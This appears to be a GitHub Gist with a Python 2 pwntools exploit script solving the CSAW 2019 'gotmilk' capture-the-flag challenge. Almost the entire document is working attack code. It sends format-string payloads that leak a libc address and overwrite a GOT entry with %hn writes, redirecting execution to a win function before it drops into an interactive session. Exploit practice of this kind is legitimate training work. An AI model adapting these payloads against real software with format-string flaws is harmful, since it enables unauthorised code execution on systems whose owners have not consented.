Created
September 15, 2019 21:35
-
-
Save lionaneesh/bda0fe49012a1d627277e19cfecd968d to your computer and use it in GitHub Desktop.
CSAW 2019 gotmilk solution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| from pwn import * | |
| # nc pwn.chal.csaw.io 1005 | |
| win_offset = 0x00001189 | |
| lose_offset = 0x000011f8 | |
| context.terminal = [ '/usr/bin/gnome-terminal', '-e' ] | |
| lose_addr = p32(0x804a010) | |
| lose_addr_2 = p32(0x804a012) | |
| # first we need to leak libc, for that we need to print lose_addr and then redirect to another fgets. | |
| # step 1: read lose_addr, overwrite lose_addr to 0x0804866f | |
| # step 2: overwrite lose_addr with new leak | |
| #winaddr = win_offset + base | |
| afterladdr = 0x0804867e | |
| allower = afterladdr & 0xFFFF | |
| alupper = (afterladdr >> 16) & 0xFFFF | |
| #win_addr_lower = winaddr & 0xFFFF | |
| #win_addr_upper = (winaddr >> 16) & 0xFFFF | |
| print 'afterladdr', hex(afterladdr) | |
| print hex(allower) | |
| print hex(alupper) | |
| offset_1 = (alupper - 31) | |
| offset_2 = (allower - alupper - 13) | |
| # for offset in range(32,50): | |
| for x in range(0, 0x01): | |
| print 'try', x | |
| local = False | |
| if local: | |
| libmy = ELF('libmylib.so') | |
| elf = ELF('./gotmilk') | |
| p = elf.process() | |
| # p = elf.debug(gdbscript = '''c''') | |
| else: | |
| #host = 'pwn.chal.csaw.io' | |
| host = '0.0.0.0' | |
| port = 2020 | |
| #port = 1004 | |
| p = remote(host, port) | |
| payload = list("_" * 99) | |
| payload[0:4] = lose_addr_2 | |
| payload[4:8] = lose_addr | |
| payload[8:15] = "%" + str(offset_1) + "d" | |
| payload[15:21] = "|%8$s|" | |
| #payload[21:25] = "%8$s" | |
| payload[25:30] = "%7$hn" | |
| payload[35:42] = "%" + str(offset_2) + "d" | |
| payload[50:55] = "%8$hn" | |
| payload = ''.join(payload) | |
| print 'sending', payload | |
| raw_input("Checkpoint!") | |
| fp = open('payload', 'w') | |
| fp.write(payload) | |
| p.recvuntil('GOT milk? ') | |
| p.send(payload + "\n") | |
| raw_input("Checkpoint after sent!") | |
| output = p.recv(timeout=1).strip() | |
| # p.send(payload + "\n") | |
| print len(output), output | |
| leak = output[output.find('|') + 1:][::-1][-4:] | |
| loss_addr = int(leak.encode('hex'), base=16) | |
| base = loss_addr - lose_offset | |
| # input() | |
| payload = list("_" * 99) | |
| target_addr = base + win_offset | |
| tlower = target_addr & 0xFFFF | |
| tupper = (target_addr >> 16) & 0xFFFF | |
| print hex(base), hex(target_addr) | |
| offset_1 = (tlower - 15) | |
| offset_2 = (tupper - tlower - 15 - 1) | |
| print offset_2, offset_1 | |
| print 'offsets', hex(offset_2), hex(offset_1) | |
| payload[0:4] = lose_addr | |
| payload[4:8] = lose_addr_2 | |
| payload[8:15] = "%" + str(offset_1) + "d" | |
| payload[21:28] = "|%4$hn|" | |
| #payload[27:33] = "|%5$p|" | |
| #payload[33:39] = "|%6$p|" | |
| #payload[39:45] = "|%8$p|" | |
| #payload[25:30] = "%7$hn" | |
| payload[35:42] = "%" + str(offset_2) + "d" | |
| payload[50:55] = "%5$hn" | |
| payload = ''.join(payload) | |
| print 'sending', payload | |
| print output | |
| fp.write("\n" + payload + "\n") | |
| p.send(payload + "\n") | |
| output = p.recv(timeout=1).strip() | |
| print output | |
| output = p.recv(timeout=1).strip() | |
| print output | |
| output = p.recv(timeout=1).strip() | |
| print output | |
| p.interactive() | |
| p.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment